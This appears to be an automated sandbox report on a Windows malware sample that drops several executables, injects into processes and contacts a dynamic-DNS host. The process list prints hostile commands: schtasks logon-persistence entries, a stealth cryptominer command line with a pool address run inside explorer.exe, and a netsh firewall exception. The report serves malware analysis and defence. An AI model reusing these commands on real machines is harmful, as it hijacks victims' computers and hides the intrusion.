Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3200 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 3200 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 3200 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 3200 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 3200 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 3200 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 3432 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 3432 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 1020 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2776 wrote to memory of 4956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2776 wrote to memory of 4956 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1020 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 1020 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 3432 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 3432 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 4648 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 4648 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 4648 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 4648 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 5116 wrote to memory of 1436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5116 wrote to memory of 1436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4912 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 4912 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 3312 wrote to memory of 4776 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sihclient.exe
PID 3312 wrote to memory of 4776 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sihclient.exe
PID 1956 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1956 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1956 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4912 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 4912 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 2424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2424 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 2424 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 4612 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4612 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2424 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 3492 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 3492 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 3492 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

C:\Users\Admin\AppData\Local\Temp\lear.exe

"C:\Users\Admin\AppData\Local\Temp\lear.exe"

C:\Users\Admin\AppData\Local\Temp\svhost.exe

"C:\Users\Admin\AppData\Local\Temp\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"

C:\Users\Admin\AppData\Local\Temp\services32.exe

"C:\Users\Admin\AppData\Local\Temp\services32.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\services64.exe

"C:\Users\Admin\AppData\Local\Temp\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv kJYy6oQToUmTHYGhxZtTsw.0.2

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 1.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
DE 140.82.121.3:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
GB 88.221.134.18:80 tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 104.21.10.32:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 172.67.189.225:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 172.67.189.225:3359 tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/3200-0-0x0000000000AA0000-0x0000000000DB8000-memory.dmp

memory/3200-3-0x000000001BA30000-0x000000001BA40000-memory.dmp

memory/3200-2-0x000000001BA30000-0x000000001BA40000-memory.dmp

memory/3200-1-0x00007FFE4BE60000-0x00007FFE4C921000-memory.dmp

memory/3200-4-0x000000001BA30000-0x000000001BA40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 0bff36b53d94dbeba2ca37da0ee15631
SHA1 4536eb13dd54de6b25d0de95272efd65eb70234c
SHA256 841b1aac0d31d294a7ee3a77946947e24ef8eba639c67b9004337b0689f28ac9
SHA512 0fa04ec542b27d13fe9e45a7bca2094ad628c8e80a5466ec264fd85b54a56899dc23bd6898879af4919609b336e8b75965ba743326149959fdeec27a0fe4f668

C:\Users\Admin\AppData\Local\Temp\svhost.exe

MD5 696f2e0facba8c9bc7e2269986bada95
SHA1 aaa3ce178ba47c0e370c3ca40b99654cf61d99dd
SHA256 de781ab98b48f1d32a0eac30ab8e9f3d0de9d532db7720fd0a803f227abb039a
SHA512 afa581a6e90aac8b6dc99fa15bfcf078d83af623bee1d79ed9f7578160d6651fa80f2deaf3b43d9a5082442cb82b9e5fd2c3d18d51d5f7cd52182115511baaeb

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 95f767c722a38a1cefe083d99422a58d
SHA1 16eb39ae6079acbc7a9bbe88eb3ebbe85ade9cf8
SHA256 157f6767a523fbbd1c304aa1b855c1e843b49d227cc4c7df702262b11c75bda1
SHA512 a56fb76657217691632f79295d85d845df35b45b0302727e2724413c508757bcb983ea6b87be5629368980929ae86035483c28c4c8266d545ecadfcc4d1a5944

memory/3200-71-0x00007FFE4BE60000-0x00007FFE4C921000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 19b6f0bec5362333d1d87f4679208d72
SHA1 a4f6bdec95a45bd30c874c2a44a3222b948f966f
SHA256 a0e550e73ffaba9fc8a24d91a14d17ed4402ac30dc90e5ac42625115d50cabdb
SHA512 18d3f8ec0269c06ee1f48ead949e852b726b7813cf5d4fa61497b0a01dae2f9b661f5ce5eb7122f11e346397f4fa92b2977ffe2542f92bb2e8d60f0772667b6f

memory/1956-73-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/1956-74-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/1956-75-0x0000000001660000-0x0000000001670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 9ddac033ac79900f5ad182c557c328d1
SHA1 e7178202799f83f318a1083fb10910278ba1efe9
SHA256 316af643b17f7f6f9a74775791d5603a2eba9b35fa758dda2f4d3b884e3839bd
SHA512 eee3d87857d7bc6f45a88bf49aa05ec0fedd48f32ee7fae04f2e840a24e635b4340275093253cf1639194dc0277c5e0e9e5c06deb7178127bff6d1dcc5db53be

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 43d590f88270ff8963d47a4a5161cd2c
SHA1 2ba74ac4fec486373c0ebe94bc75223ab2600490
SHA256 db25ed27bfdfde3b88b4a7483e15bdecc587f694e8dc2c1ca91325e1d5b4453a
SHA512 00a156c09c6d7e5dc25f89aecd4051a3d555aec268d313d328ea12ebb30a30a7d2d80a152e8b06bd477fe9fd01ee16ecbef62edf249b03fc59f0fd809b9934a0

memory/1020-90-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 40640840746d6a6c57a2d75527df8991
SHA1 13deceda20b587158231fa7613b78a77172f86ce
SHA256 f05e99298ab69dd46226761dacb6933f03bbcb95f8bfb0238a578af15e187039
SHA512 2e06df6a763cbef37f0bdabe15cae69ad90d5e0614617f875f249837241b8838a0ea0dd1a2a04d1b5ef5c522167811ee542da57d3aa09b2e5a07c9c223c041f3

memory/1020-92-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/1020-93-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

memory/1020-95-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

memory/1020-94-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/1020-96-0x00000000037C0000-0x00000000037CA000-memory.dmp

memory/1020-98-0x0000000003C50000-0x0000000003C60000-memory.dmp

memory/1020-97-0x0000000003C30000-0x0000000003C42000-memory.dmp

memory/4648-112-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services32.exe

MD5 25c8ed402887392f040d5df468f72c28
SHA1 d0ce1a4bc8146fd69b96253744160d684b5da285
SHA256 5419970b47d0b6e6550db7feaa099928b2f903f4fdffa10a0ef5ffbf92e61576
SHA512 865fc814f9314bec937773b0172a496b8c27e1fdbfc14418ae73d199eff4d89dad4d1d3615247b356b58bf440003f0df8bcce32b32f7032c0dd20cd93f4e17a4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 611f87f2772d9497a398a841060635b9
SHA1 87f09e34188c36929a8711b007ffa985d31c7191
SHA256 1cfe9df671ad4323ec6713fb0838592e2de707e1dadd93be8fede2addf541a3e
SHA512 d2fd1ea8862690ee0458d8af38470547bb6bc38916a767f150ba4089de8c3776ebf9d0e4e5be35fb75c2af4e68528042cd975cf7541db881379394f07ca3e4b2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 9c648eeade4c8b324585f38247f40740
SHA1 f5c348717d3a76a370048c5a5195a303f0daaa07
SHA256 46f961a91e90790ca245e819a60faf357aa8af518a05d7c22053032d67360f83
SHA512 3bcd1e06b8e4616d582bd1f0211baaf6fc7a3028815ddbb7bc3ec262d5918826139758c3a355b1a044e0b6070db1fe360718ed82a9dbf9dcc46dfb34850112b4

memory/4912-126-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4648-129-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4648-130-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/4912-134-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/4912-135-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4912-136-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/1956-133-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/4912-132-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4648-128-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

memory/4648-127-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

MD5 50075fb9b3b6faae5c0184b3e69a891a
SHA1 f0fd43ea6936473d6a39ee6edfb77c5365465ec5
SHA256 c64a0c0c1a706706a770e38716e14d340d469f26fbf00534545ef59c4a88ffa2
SHA512 6e67ba375a6af58d0c86750fb165130e06235fc5c895ae9bbcf4a8e6b08717af1fad74624ba38ae5f3bccd67453bc6cbe82dcfba018d63d3f0b10b570a844b31

memory/1020-114-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp

memory/1020-113-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services32.exe

MD5 ce128f070c0ee7cbd879ca932f6635b1
SHA1 5cd7502bfaf0461b6c71f1e58639435ca9838eae
SHA256 f45f3f008a7903e2b96e0d3c216d0dad3705ffe7a5f5cba4c2014e9c9363b3e2
SHA512 d0c68081d090de4ed1526e98236ebfa3064d9d64b3c110f69a096448409e1522f60ddeac3eff575a831568862a3e3178016c47ab1eb6265fe73b8b7183a8349a

memory/4648-137-0x0000000004590000-0x00000000045A0000-memory.dmp

memory/3204-151-0x00000000003A0000-0x00000000003A6000-memory.dmp

memory/1956-152-0x0000000001660000-0x0000000001670000-memory.dmp

memory/4912-155-0x0000000003E80000-0x0000000003E90000-memory.dmp

memory/3204-156-0x000000001BE40000-0x000000001BE50000-memory.dmp

memory/3204-154-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4912-153-0x0000000003410000-0x000000000341E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

MD5 7f13e2b226baf92c8c7aa34606a33043
SHA1 957594155513bcb9adf119fbd683d6222c97b6f7
SHA256 82daa75486edff63daa1eb62220e8aaeea23691151ba98f9f3b8b87f51428e3d
SHA512 a164fc7ecdd842fcedea61025fd8f9abe7c9efa06d08493be2413a052fa91e9c1818bbf006475b3f740174a0c7e6e474ee7f5fa2b703b4f164a8849d4dcc02a1

memory/3492-169-0x0000000001430000-0x0000000001440000-memory.dmp

memory/3492-168-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/1956-167-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/4648-173-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4648-174-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp

memory/2424-186-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

memory/4912-188-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp

memory/4912-190-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/2424-194-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/2424-193-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

memory/2424-192-0x00007FFE69970000-0x00007FFE69980000-memory.dmp

memory/2424-191-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 e1600c76646028abf588db4acbf5d6d8
SHA1 33968a07ed3ba13704f723cf42f06d289a0bfdea
SHA256 87c0c43b47a5a17ae3df59343e8f2c12c48c2b30ef2c92c0a4d63176353533d2
SHA512 64fe3c44c494eb5a1ba400a386d0426dedf2e6df86ae8a819354e7b57633940e693489e0ef8fea49c39d6ef060b8a32884a3dc3205fafc208e1bd19e91e3154f

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 2bbec033125ea50257184b2656416fd4
SHA1 f6cfe41ea675edfd614c7d5809736540ebf5fff2
SHA256 56b86287dea61cc557b726bc56024096ad21eb5821782933f35e78688a2d5109
SHA512 a048b9c9056ed7a1851153ae15db7ee5ce76d66b9e3c358d9641d3470eccfc0ef65322be0b49bfb34424b3d9f60dd994cc056f13d67069caca1336d06ca53a00

memory/2424-195-0x000000001D250000-0x000000001D260000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 16379e3af6a104ba50f80465c44297b3
SHA1 23fa672955f7519aa8ab000977560fa952069052
SHA256 a37d2858b1c7aa02fc4ff57dd4c0f6822fa280c3fae16ca0d79d4df51db1ceae
SHA512 97a19c76e28214e5cff3bc0164edbb5f52f627a414a2e9008033b398549641d434aad8f97095399c994f7dfb372eb72bafbf706a31877cc2bb7dabb229d0db59

memory/4836-210-0x0000000000640000-0x0000000000646000-memory.dmp

memory/4836-211-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4836-212-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/4072-216-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2424-220-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp

memory/2424-222-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4072-221-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-224-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-225-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-227-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-226-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-223-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-219-0x0000000001F20000-0x0000000001F40000-memory.dmp

memory/4072-218-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4072-214-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3204-229-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/3204-230-0x000000001BE40000-0x000000001BE50000-memory.dmp

memory/3492-232-0x0000000001430000-0x0000000001440000-memory.dmp

memory/3492-231-0x0000000074600000-0x0000000074BB1000-memory.dmp

memory/4836-233-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp

memory/4836-234-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/4072-235-0x0000000140000000-0x0000000140786000-memory.dmp